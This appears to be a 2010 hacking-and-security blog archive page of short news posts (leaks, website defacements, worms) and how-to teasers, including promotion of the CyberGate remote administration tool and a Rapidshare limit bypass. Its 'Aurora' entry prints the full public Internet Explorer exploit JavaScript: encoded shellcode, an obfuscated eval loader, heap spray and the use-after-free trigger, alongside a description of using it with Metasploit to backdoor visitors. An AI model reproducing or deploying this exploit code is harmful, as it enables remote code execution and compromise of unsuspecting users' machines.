xmlns:fb=’http://www.facebook.com/2008/fbml’ 2010 | Ethical Security

search

Custom Search

Wednesday, December 29, 2010

44 000 Mozilla Passwords Leaked

Around 44 000 usernames and passwords associated with the accounts registered on Mozilla add ons websites were  made public accidentally The partial database of user accounts was mistakenly left on a Mozilla public server . Mozilla says there is nothing to panic as they were accessed by no one except a security researcher who found them .

Friday, October 1, 2010

How to Trace IP address from Gmail ,Yahoo ,Hotmail

If you deal with Computer Security and Penetration testing , you must be knowing the importance on IP address . To perform any kind of penetration testing or hacking you first need to know the IP address . Here I am going to discuss how to obtain IP address from Gmail , Yahoo and Hotmail .

Saturday, September 25, 2010

7 Ways to Protect your Orkut Profile from Bom Sabado

Another XSS worm has attacked Google's Social Networking site Orkut . This time the worm is Bom Sabado . This virus Bom Sabado attacked Orkut this morning .“Bom sabado” is a Portuguese world it means “Good Saturday” in English.

Friday, September 3, 2010

Top 10 Security Threats of 2010

OWASP has released the list of top 10 web security threats of 2010 . The Open Web Application Security Project (OWASP) is an open community dedicated to the enhancement of all kinds of web and computer security . These are the threats which has caused the maximum damage to cyber world in 2010 . Here are these security risks .

Friday, August 27, 2010

Is Ankit Fadia really a Hacker ?

There are only few people in the hacking field who have never heard about Ankit Fadia ,the so called self declared  “India’s Best Ethical Hacker” ,There are lot of arguments and facts against him , Some people says  he is not a HACKER he is just a good businessman who knows how to make fool of the peoples . The thing that made him so much famous is only Media coverage nothing else. Now lets talk about Fadia's  claims and some facts about him .

Monday, August 23, 2010

Computer Hacking with CyberGATE

In this article I am going to discuss about a Remote Administrative tool CyberGate .CyberGate is a powerful, fully configurable and stable Remote Administration Tool .It was built to be a tool for various  possible applications, ranging from assisting Users with routine maintanence tasks, to remotely monitoring your Children, captures regular user activities and maintain a backup of your typed data automatically. It can also be used as a monitoring device for detecting unauthorized access. CyberGate achieves this though it's abundant array of features. A few of which are illustrated below .

India arrests hacker who exposed EVM vulnerability

Hari Prasad , a Computer Scientist and Security Researcher (Hacker ) has been arrested by police in Hyderabad . Hari Prasad is the same person  who exposed weakness in India's Computerized Electronic Voting Machine (EVM) that could allow corrupt politicians to steal votes . According to the reports Prasad is arrested because he refused to disclose an anonymous source who provided an electronic voting machine.

Friday, August 20, 2010

Persistent XSS (Cross-site scripting) in Mail.com

Mail.com Media Corp. is an American digital media company controlled and operated by Jay Penske.The company owns and operates Mail.com, a free email service with over 14,434,646 registered accounts that competes with Gmail and Yahoo! Mail, and also serves as a news and topical web portal.

Sunday, August 15, 2010

Vijay Mallya Website Hacked by Pakistan Cyber Army

Official website of Vijay Mallya http://mallyainparliament.in/ was hacked by a Pakistan based group called Pak Cyber Army .The hackers have left three Pakistan flags on the website - www.mallyaparliament.in Mallya's office has now reported the matter to the Karnataka Police. The site has now been restored to normal . Here are the snaps of the site when hacked . And a video about Times Now report on Malllya site Defacing .

Indian Hackers Celebrate Independence day 1000+ Pakistani Websites Hacked

This Independence day was  a nightmare for some of the webmasters and website owners  of both India and Pakistan .  There has been cyber attacks on the websites of both India and Pakistan . A lot of websites were hacked and defaced . The attack was started by Pakistani hackers defacing some Indian websites on 14th August (Independence day of Pakistan ) , this was followed by counter attack from Indian Hackers .

Friday, August 13, 2010

Chinese Hackers Hijack Gmail

Chinese Internet users indicate that when Gmail is accessed, users are auto-forwarded to a replica site at a different address (http://124.117.227.201/web/gmail/) where they're asked to enter or re-enter their account information. users connect to this non-Google owned site if they use Google's browser toolbar or simply enter the address "www.gmail.com.

Thursday, August 12, 2010

Independence day and Indo -Pak Hackers

Two hostile Asian countries Pakistan and  India will be cerebrating their independence day on 14th and15th august respectively. This will be a joyful moment for the citizens of both the countries. Except the webmaster and website owners of these countries as hackers of both the countries will also be celebrating this independence day in their own style.

Tuesday, August 10, 2010

SMS Trojan Attacks Android Phones

First sms trojan called SMS.AndroidOS.FakePlayer.a has attacked the Google Android phones . It has already infected a number of mobile devices, according to security firm Kaspersky Lab. once installed,this Trojan sends out SMS text messages without the users' knowledge or consent.

Monday, August 9, 2010

How to obtain a Root Shell via Metasploit

In this video, redmeat_uk demonstrates how to obtain a root shell from Metasploitable, a VMware machine of vulnerable applications and services. This example will demonstrate how to obtain a root shell via Metasploit auxiliary modules and the MySQL client

Saturday, August 7, 2010

XSS in Yahoo groups

XSS vulnerability in yahoo group , this video below show how xss and html scripts could be injected in yahoo groups .

Friday, August 6, 2010

India to make Cyber Army of Ethical Hackers.

No doubt this is a late step , Government of India has finally decided to build a network of ethical hackers to spy on the classified data of hostile nations by hacking into their computer systems Information Technology professionals and ethical hackers will be  hired for this  purpose .IT workers and ethical hackers who sign up for the ambitious project will be protected by law, says the proposal being discussed by senior government administrators.

Thursday, July 29, 2010

How to scan for open ports using netcat and superscan

Most of the times there is a need to know the open ports for the analysis of system security . A attacker can get into your system through the open ports . To fix it you need to know which ports are open , so than you can take the necessary steps . Here is how you can check those open ports using netcat , superscan and strobe applications .

Tuesday, June 15, 2010

Google engineer unveils bug that attacks Windows XP

Google engineer Tavis Ormandy has exposed the bug that attacks the Windows XP systems. Now he is finding himself under trouble over making the bug public just five days after informing Microsoft about the vulnerability.Microsoft is now investigating the issue and is expected to release a fix for it relatively soon.

Wednesday, May 26, 2010

Hack digital pictures to send secret messages

This video tutorial will teach you a simple hack that will allow you to hide a secret message in any digital picture. Who knew a picture could actually be worth a thousand words? Real words, embedded within!

Sunday, May 16, 2010

Hackers can kill your car brakes and engine

Researchers have found serious vulnerabilities in the computer systems used in the Cars . These vulnerabilities can be exploited to do nasty things things, such as turning off the brakes, changing the speedometer reading, blasting hot air or music on the radio and locking passengers in the car.

Thursday, May 6, 2010

Facebook Exploit , view your friends’ live chats

A major security hole has been found in Facebook . This facebook exploit lets you view your friends live chats .This exploit is like a facebook hacking tricks .With this exploit you can also view your friends pending friends request . The video below demonstrate how to use this facebook exploit .

Friday, April 30, 2010

Don't scan these ip address ,you will be caught

There are certain IP address of  government and other organizations which should never be scanned . All activities on these IP s are monitored . If you scan these IP you will be caught and jailed  Here is the list of some of such IP address .

Sunday, April 18, 2010

Indian Embassy's website hacked by Chinese hackers

Indian Embassy website ,Russia  has been attacked by Chinese hackers . At least two cyber attacks has been traced to Chinese servers . The Embassy officials denied any leakage of crucial information .

The website allows for online filling of visa and passport applications.

"The indianembassy.ru website in the public domain was affected to some extent that e-mail IDs of the senior officials were cloned in the .com or gmail domains to spread the malware," the sources said.

"For example for the legitimate 'infowing@ indianembassy.ru', IDs like 'infowing@indianembassy. com' and 'infowing@gmail.com' were used to spread spam with malware," the sources said.

Friday, April 16, 2010

Books , which every beginner of hacking should read .

I have seen many guys running here and there to learn about hacking . I often get email from enthusiastic newbies asking  "how can I learn to be a  hacker? You cant learn to hack magically , just by reading some tuts and doing some funny stuff don't make you a hacker . To be a hacker you need to know how things works , then only you can know how hacking works . To be a hacker you need to get the basic  knowledge about internet and networks  , for that you have to read , now what to read ?  Here are some books that every newbie hacker should read , if you seriously wanna be a hacker .

Thursday, April 15, 2010

The History of Hacking

This is a documentary video on History on Hacking  prepared by Discovery Channel . It reviews the great landmarks of hacking . How it begin and how its going in today's world .

Sunday, April 11, 2010

Son Sues Mom for Hacking Facebook Account

A 16-year-old Arkansas boy is suing his mother for hacking into his Facebook account and allegedly posting slanderous remarks.According to the boy, his mother hacked into his Facebook and email accounts, then changed both passwords. She also allegedly posted remarks that involved slander and information about his personal life.

Thursday, April 8, 2010

Chinese Female Hacker Group , Ladies in Action

In the male dominated world of Chinese hackers, females find it difficult to be accepted as equals. Their technical skills are often viewed as inferior to their male counterparts.
As far as I am aware, the first group of female Chinese hackers to break this mold were the Six Golden Flowers. The Golden Flowers have since broken up and gone their separate ways, but a new and larger group has taken their place, the Cn (China) Girl Security

Team.
The website for the China Girl Security Team was registered on 12 Mar 2007 and currently has 2,217 members. The leader of the group Xiao Tian, is only 19 years old:


 Via

Thursday, April 1, 2010

What's the security rating of your PC?

Comodo Firewall Test Suite is an all-in-one application that sequentially launches 34 of the most effective leak tests against your computer's security. When the full cycle of tests has been completed you will be provided with detailed results that will inform you which individual tests your system is vulnerable to.

Your system will also be awarded an overall security score based upon its overall performance against the suite of tests. (Highest and most secure score = 340)

Test your Security

Wednesday, March 24, 2010

By pas Rapidshare waiting time

This a hacking trick to by pass rapidshare waiting time . As  most of you know, Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. To get around this, you need to show the rapidshare server a different IP address. By following these simple steps you can by pass rapidshare waiting time .



1. Goto the page you want to download. (the rapidshare address of your download)
2. Select FREE button
3. In the address bar put the following:

javascript:alert(c=0)
4. Click on the "go to" button
5. Click OK to the pop-up box
6. Enter the captcha
7. Download Your File
8. Enjoy! 

60 Proxy websites for staying anonymous online

This summary is not available. Please click here to view the post.

Thursday, March 18, 2010

Indian Cyber Warriors [ICW] Strikes again

Indian Cyber Warriors strikes again , A lot of Pakistani websites and portals were defaced by ICW . " Its "Payback time "  , the defaced pages were displaying this message . This has been another Cyber attack on Pakistan by ICW after  26/11 anniversary . The sites which are reported to be defaced are

http://www.netmag.com.pk/
http://unioninvestments.com.pk/
http://www.jamshoro.gos.pk/
http://www.marcus.com.pk/
http://www.alsaud.com.pk
http://www.multimediamars.com/
http://syntaxbd.com/


Saturday, March 13, 2010

Authentication by pass with Sql injection

While most applications require authentication for gaining access to private information , not every authentication method is able to provide adequate security. The video below demonstrate how Authentication can be by passed .




Note: only for educational purpose

Tuesday, February 2, 2010

How Chinese used “Aurora” IE Exploit Against Google

Google and China were in news last week . Chinese hackers were reported to be involved for hacking in the Google network. In the coming lines we will be discussing how the attack was carried out on the Google network.

Attacker have used the invalid pointer reference vulnerability found in IE 6 , 7 and 8 .They exploited this vulnerability on IE6 .Recently Microsoft has issued an Advisory 979352: saying “In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution". This IE vulnerability is called as Aurora .The video below demonstrates how crackers used this Aurora vulnerability with Metasploit to get into Google computers.

The "Aurora" IE Exploit in Action from The Crew of Praetorian Prefect on Vimeo.




Metasploit set up a listening session, set up a web site that serves up the malicious code, and watch as an unsuspecting user visits the web site, triggers the attack that uses the IE vulnerability, and unknowingly opens a connection to a computer owned by the attacker. The attacker then lists the user’s processes, and elects to kill Notepad where the user was working on an important document. IE 6.0 is used, as this is the version Microsoft references as having been used in the “targeted attacks” on some 30+ U.S. companies.once the backdoor is open to the user’s PC the attacker can use it as a pivot point for other attacks against the internal network, escalate his or her privileges, take information off the PC, basically do anything the user can do.

The attack scenario is that users were pointed to a web site (probably through a targeted Spam e-mail, an attack called spear phishing) containing a JavaScript that references this invalid pointer and injects the included shell code. The code below is now released publicly .

var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
);
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i < 200; i ++ ){
x1[i] = document.createElement("COMMENT");
x1[i].data = "abc";
}
;
var e1 = null;
function ev1(evt){
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50);
}
function ev2(){
p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
for (i = 0; i < x1.length; i ++ ){
x1[i].data = p;
}
;
var t = e1.srcElement;
}


Click here for more details

Friday, January 29, 2010

China under cyber attack 200+ Government sites hacked

Recently there was a news that Chinese hackers have hacked into Google. Chinese hackers were also in news for hacking into Indian PMO(prime minister office ).But now the news is that china is under Cyber attack .Some the hackers from Serbia and Turkey have attacked many Government Chinese sites . Around 240 sites have been attacked and defaced ,most of them are government sites .The attack has been reported to zone-h.org.
All list is available at zone-h . Some the popular defaced sites are .

http://www.jrlss.gov.cn/
http://www.qf580.gov.cn/
http://www.txcgj.gov.cn/
http://www.lneti.gov.cn/
http://www.kfzx.gov.cn/
http://www.pnmzj.gov.cn/

zone-h mirror is http://www.zone-h.org/archive/notifier=spook/page=1





Related Posts with Thumbnails
When reproducing our materials in whole or in part, hyperlink to the articles should be strictly made Creative Commons License This work is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 2.5 India License.